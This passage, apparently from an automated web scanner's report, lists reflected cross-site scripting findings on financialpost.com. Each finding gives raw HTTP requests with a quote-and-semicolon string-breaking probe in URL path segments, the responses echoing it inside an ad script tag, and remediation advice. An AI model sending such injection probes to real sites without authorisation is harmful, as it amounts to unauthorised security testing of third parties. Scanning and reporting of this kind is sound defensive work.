This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-finance/Elderly+brain+makes+riskier+investments/3983726565bd'%3b35fb979a5ac/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 64674
Expires: Sun, 19 Dec 2010 03:11:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:11:54 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/personal-finance/elderly-brain-makes-riskier-investments/3983726565bd';35fb979a5ac/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=personal-finance;kw=elderly-brain-makes-riskier-investments;kw=3983726565bd';35fb979a5ac;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+ ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a48af'%3b7e65cea9d7b was submitted in the REST URL parameter 4. This input was echoed as a48af';7e65cea9d7b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-finance/Elderly+brain+makes+riskier+investments/3983726/a48af'%3b7e65cea9d7b HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:09 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 38793
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a3bd2'%3b4a915ea03ce was submitted in the REST URL parameter 1. This input was echoed as a3bd2';4a915ea03ce in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-financea3bd2'%3b4a915ea03ce/Retired+forgotten/3953088/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 83722
Expires: Sun, 19 Dec 2010 03:10:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:55 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/personal-financea3bd2';4a915ea03ce/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=personal-financea3bd2';4a915ea03ce;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=34415371?"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 55b32'%3b7da1471c85e was submitted in the REST URL parameter 3. This input was echoed as 55b32';7da1471c85e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-finance/Retired+forgotten/395308855b32'%3b7da1471c85e/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 69813
Expires: Sun, 19 Dec 2010 03:11:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:11:23 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/personal-finance/retired-forgotten/395308855b32';7da1471c85e/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=personal-finance;kw=retired-forgotten;kw=395308855b32';7da1471c85e;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=70920 ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4833e'%3bb4e5a632b37 was submitted in the REST URL parameter 4. This input was echoed as 4833e';b4e5a632b37 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-finance/Retired+forgotten/3953088/4833e'%3bb4e5a632b37 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:11:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:11:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44021
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 13e57'%3bca94ef828cc was submitted in the REST URL parameter 1. This input was echoed as 13e57';ca94ef828cc in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-finance13e57'%3bca94ef828cc/Warning+Asset+bubbles+underway/3976343/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 82115
Expires: Sun, 19 Dec 2010 03:11:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:11:43 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/personal-finance13e57';ca94ef828cc/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=personal-finance13e57';ca94ef828cc;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=93912031?"> ...[SNIP]...